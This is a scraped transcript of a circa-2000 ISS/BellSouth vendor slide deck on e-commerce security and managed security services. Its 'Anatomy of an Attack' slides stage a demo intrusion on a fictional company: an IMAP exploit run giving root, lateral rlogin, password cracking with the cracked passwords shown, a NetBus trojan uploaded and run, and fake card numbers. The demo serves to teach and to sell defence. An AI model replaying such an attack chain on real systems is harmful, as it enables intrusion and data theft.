protecting the digital economy
DESCRIPTION
Protecting The Digital Economy. David Gerulski Director of Marketing Internet Security Systems. Agenda. Introduction E-Commerce Security Drivers Developing a Security Policy Anatomy of an Attack Policy Enforcement Enterprise Risk Management Security Resources Conclusion. ISS Overview. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/1.jpg)
Protecting The Digital EconomyProtecting The Digital Economy
David GerulskiDavid GerulskiDirector of MarketingDirector of Marketing
Internet Security SystemsInternet Security Systems
![Page 2: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/2.jpg)
Agenda
• Introduction• E-Commerce Security Drivers• Developing a Security Policy• Anatomy of an Attack• Policy Enforcement• Enterprise Risk Management• Security Resources• Conclusion
![Page 3: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/3.jpg)
ISS Overview
• Headquartered in Atlanta, GA, USA
• Pioneered vulnerability assessment and intrusion detection technology
• Leader in Enterprise Security Management
• Publicly traded on NASDAQ: ISSX
• Industry leading technology 35+ product awards
• 1,000+ employee owners worldwide
• Over 300 certified security partners
• Over 7,500 customers worldwide
![Page 4: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/4.jpg)
ISS Market Share
Source: International Data Corporation (IDC), August 1999
NetworkVulnerability Assessment
Market
NetworkIntrusion Detection
Market
NetworkIntrusion Detection & Assessment Market
![Page 5: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/5.jpg)
E-Commerce Security Drivers
E-Commerce Security Drivers
![Page 6: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/6.jpg)
Business Is Changing
Source: Forrester Research, Inc.
Access is granted to employees only
Applications and data are centralized in fortified IT bunkers
Security manager decides who gets access
Internal Focus
Centralized Assets
The goal of security is to protect against confidentiality
breaches
Prevent Losses
IT Control
Yesterday
Suppliers, customers, and prospects all need some
form of access
Applications and data are distributed across servers,
locations, and business units
The goal of security is to enable eCommerce
Business units want the authority to grant access
External Focus
Distributed Assets
Generate Revenue
Business Control
Today
![Page 7: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/7.jpg)
The Threat Grows
Source: 1998 Computer Security Institute/FBI Computer Crime and Security Survey
38%47% 54%
60%
40%
20%
1996 1997 1998
![Page 8: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/8.jpg)
The Internal Threat Is Real
![Page 9: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/9.jpg)
E-Commerce Issues
Principle Business Drivers
• Increase Revenue
• Increase Profitability
Principle Security Drivers
• Greater Susceptibility to Attack
• Greater Probability of Catastrophic Consequences
• Much Greater “Loss to Incident” Ratio
![Page 10: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/10.jpg)
Our Strength Is Our Weakness
• In Touch With Anyone With a Modem
• Have an International Presence
• Partners Can Now Collaborate
• Leverage Web-based Supply Chain Technologies
• Employees Can Work From Home, at Night, Over
the Weekends, and on Holiday
• Application Servers Can Support Entire Divisions
![Page 11: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/11.jpg)
Consequences
• Exposure to Legal Liability
![Page 12: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/12.jpg)
DDoS Distributed Denial-of-Service
UNIXFirewall
Web Server
Router
NTUNIX NTUNIX
Company A
Company B
University A
Company C
Company D
![Page 13: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/13.jpg)
Consequences
• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image
• Exposure to legal liability
![Page 14: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/14.jpg)
![Page 15: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/15.jpg)
Consequences
• Decreased Employee Productivity
• Loss of Intellectual Property & Assets
• Inefficient Use of Resources
• Exposure to Legal Liability
• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image
![Page 16: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/16.jpg)
Summary
• E-Business is here to stay
• Networks are exposed and under attack
• There’s no more turning a “blind eye”
• It’s a business issue and it should be treated in a
business-like manner
• Implement a security program not a security
technology
![Page 17: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/17.jpg)
Developing a Security PolicyA Blueprint for Success
Developing a Security PolicyA Blueprint for Success
![Page 18: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/18.jpg)
Security Policy
• Blue Print for Good Security Program
• Standards Based - British Standard 7799
• Management Buy In
• High Level to Technical
• Business Driven Not Vendor Driven
• Non-Static
![Page 19: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/19.jpg)
Enforced Security Policy
• Minimize Exposure to Vulnerabilities
• Prepare for Attacks on Our Systems
• Manage Internal Staff Behavior
• Manage External Access and Activity
• Maintain Appropriate Security Configurations& Response Strategies
• Exploit Built-in Security Features
• Measure and Record Patterns and Trends for Future Security Planning
![Page 20: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/20.jpg)
The Anatomy of an AttackThe Anatomy of an Attack
![Page 21: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/21.jpg)
![Page 22: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/22.jpg)
![Page 23: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/23.jpg)
bigwidget.com
![Page 24: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/24.jpg)
Registrant :Big Widget, Inc. (BIGWIDGET_DOM) 1111 Big Widget Drive Really Big, CA 90120 US
Domain Name: BIGWIDGET.COM
Administrative Contact, Technical Contact: Zone Contact, Billing Contact: Simms, Haywood (HS69) Dodge, Rodger (RD32) [email protected] [email protected] 1111 Big Widget Drive, UMIL04-07 1111 Big Widget Drive, UMIL04-47 Really Big, CA 90210 Really Big, CA 90210 678-443-6001 678-443-6014
Record last updated on 24-June-2000Record expires on 20-Mar-2010Record created on 14-Mar-1998Database last updated on 7-Jun-2000 15:54
Domain servers in listed order:
EHECATL.BIGWIDGET.COM 208.21.0.7NS1-AUTH.SPRINTLINK.NET 206.228.179.10NS.COMMANDCORP.COM 130.205.70.10
![Page 25: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/25.jpg)
~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com
Escape character is '^]'.
hacker:
hacker:~$
Connection closed by foreign host.
telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)(Report problems in this server to [email protected])
. logout
* BYE bigwidget IMAP4rev1 server terminating connection. OK LOGOUT completed
Connection closed by foreign host.
![Page 26: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/26.jpg)
imap
![Page 27: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/27.jpg)
imap
![Page 28: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/28.jpg)
![Page 29: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/29.jpg)
hacker ~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.Author: Akylonius ([email protected])Modifications: p1 ([email protected])
Completed successfully.
hacker ~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)Kernel 2.0.35 on an i686
root
bigwidget:~# whoami
root
bigwidget:~# cat ./hosts
127.0.0.1 localhost localhost.localdomain208.21.2.10 thevault accounting208.21.2.11 fasttalk sales208.21.2.12 geekspeak engineering208.21.2.13 people human resources208.21.2.14 thelinks marketing208.21.2.15 thesource information systems
bigwidget:~# cd /etc
bigwidget:~# rlogin thevault
login:
![Page 30: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/30.jpg)
Allan B. Smith 6543-2223-1209-4002 12/99Donna D. Smith 6543-4133-0632-4572 06/98Jim Smith 6543-2344-1523-5522 01/01Joseph L.Smith 6543-2356-1882-7532 04/02Kay L. Smith 6543-2398-1972-4532 06/03Mary Ann Smith 6543-8933-1332-4222 05/01Robert F. Smith 6543-0133-5232-3332 05/99
thevault:~#
cat visa.txt
cd /data/creditcards
thevault:~#
thevault:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman password: nambobusername: mary password: maryusername: root password: ncc1701
thevault:~# ftp thesource
Connected to thesource220 thesource Microsoft FTP Service (Version 4.0).
Name: administrator
331 Password required for administrator.
Password: *******
230 User administrator logged in.
Remote system type is Windows_NT.
![Page 31: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/31.jpg)
![Page 32: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/32.jpg)
![Page 33: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/33.jpg)
ftp> cd \temp
250 CDW command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.150 Opening BINARY mode data connection for netbus.exe226 Transfer complete.
ftp>
ftp>
quit
thevault:~$ telnet thesource
Trying 208.21.2.160... Connected to thesource.bigwidget.com.Escape character is '^]'.
Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet ServiceTelnet Server Build 5.00.98217.1login: administrator
password: *******
*===============================================================Welcome to Microsoft Telnet Server.*===============================================================C:\> cd \temp
C:\TEMP> netbus.exe
![Page 34: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/34.jpg)
Connected to the.source.bigwidget.com
NetBus 1.6, by cf
Screendump
David Smith < [email protected] >
My Raise < URGENT >
Dear Mr. Smith
I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it.
Your Son,
Dave
David Smith
![Page 35: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/35.jpg)
Anatomy of the Attack
BigWidget’s Network
UNIXFirewall
E-Mail Server
Web Server
Router
NT
Clients & Workstations
Network
UNIX NTUNIX
imapimap
CrackCrack NetBusNetBus
![Page 36: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/36.jpg)
Real World Web Page Defacements
Real World Web Page Defacements
![Page 37: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/37.jpg)
![Page 38: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/38.jpg)
![Page 39: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/39.jpg)
New York Times
![Page 40: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/40.jpg)
![Page 41: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/41.jpg)
Policy Enforcement Through Detection and ResponsePolicy Enforcement
Through Detection and Response
![Page 42: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/42.jpg)
IT Infrastructure
Firewall
E-Mail Server
Web Server
Router
Servers
Clients & Workstations
Network
What Is Vulnerable?
![Page 43: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/43.jpg)
Applications
Router
E-CommerceWeb Server
E-Mail Server
Firewall
SAP Peoplesoft
Web Browsers
What Is Vulnerable?
![Page 44: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/44.jpg)
Databases
FirewallRouter
OracleMicrosoft
SQL Server Sybase
What Is Vulnerable?
![Page 45: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/45.jpg)
Firewall
AIX
Solaris
Router
Windows NT
Network
Operating Systems
HP-UX
Windows 95 & NT
What Is Vulnerable?
![Page 46: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/46.jpg)
Firewall
E-Mail Server
Web Server
Router
Servers
Networks
TCP/IP
Netware
What Is Vulnerable?
![Page 47: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/47.jpg)
Enterprise Risk Management
Enterprise Risk Management
![Page 48: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/48.jpg)
Enterprise Security Management
![Page 49: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/49.jpg)
Vulnerability Assessment Service
corrective action reportcorrective action report
Vulnerability:
Severity:
IP Address:
OS:
Fix:
GetAdmin
High Risk
215.011.200.255
Windows NT 4.0From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, Apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.
![Page 50: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/50.jpg)
Managed Intrusion Detection Service
EMAILALERT/
LOG
ATTACK DETECTED
RECORD SESSION
SESSIONTERMINATED
RECONFIGUREFIREWALL/
ROUTER
INTERNAL
ATTACKDETECTED
SESSIONLOGGED
![Page 51: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/51.jpg)
49%Mismanagement
44%Both
Computer Security Institute Study 1998
Reasons for firewall breach:
7%Bad Technology Bad Technology
Mismanagement
Both
Why a managed solution?
![Page 52: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/52.jpg)
Why Outsource?
• Network Security Is Complex
• Requires Specialized Skills and Dedicated Resources
• Difficulty in Hiring, Maintaining and Retaining IT Security Staff
• High Costs of Doing It on Your Own
![Page 53: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/53.jpg)
Managed Firewall Home Page
![Page 54: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/54.jpg)
Firewall Security Policy
![Page 55: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/55.jpg)
Firewall - Daily Logs
![Page 56: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/56.jpg)
Web Usage Report
![Page 57: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/57.jpg)
Intrusion Detection Daily Events
![Page 58: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/58.jpg)
Intrusion DetectionCustom - Query Entry Screen
![Page 59: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/59.jpg)
Benefits of Using BellSouth’s Managed Security Services
• Enables organizations to establish and maintain security across the Internet, Intranet and Extranet– Less expensive
• Leverage an existing security infrastructure• Offers reliability and cost-effectiveness without having to
maintain 24x7 dedicated security staff • Scaleable and modular services enable increased
flexibility to upgrade services as needed– More Secure
• Based on a robust and proven security architecture• Utilizes best of breed technologies • Supported by a dedicated staff of security engineers.• Proven operational procedures ensure proper response
and escalation of security events • Round-the-clock real-time monitoring for full-time
protection• All critical Internet-based security needs are addressed
– Free’s up your resources to focus on other key company initiatives
![Page 60: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/60.jpg)
BellSouth & ISS Value Proposition• BellSouth
– Trusted Business Partner
– Operational Excellence
– Highest levels of Customer Satisfaction
• Internet Security Systems (ISS)
– Security Expertise
– Market leader in security
• Together
– Best in class IP access and network security solutions to support your E-Business strategy
![Page 61: Protecting The Digital Economy](https://reader035.vdocuments.site/reader035/viewer/2022062305/5681585f550346895dc5bbaa/html5/thumbnails/61.jpg)
Thank You!Thank You!
For more information please join us at:
www.iss.net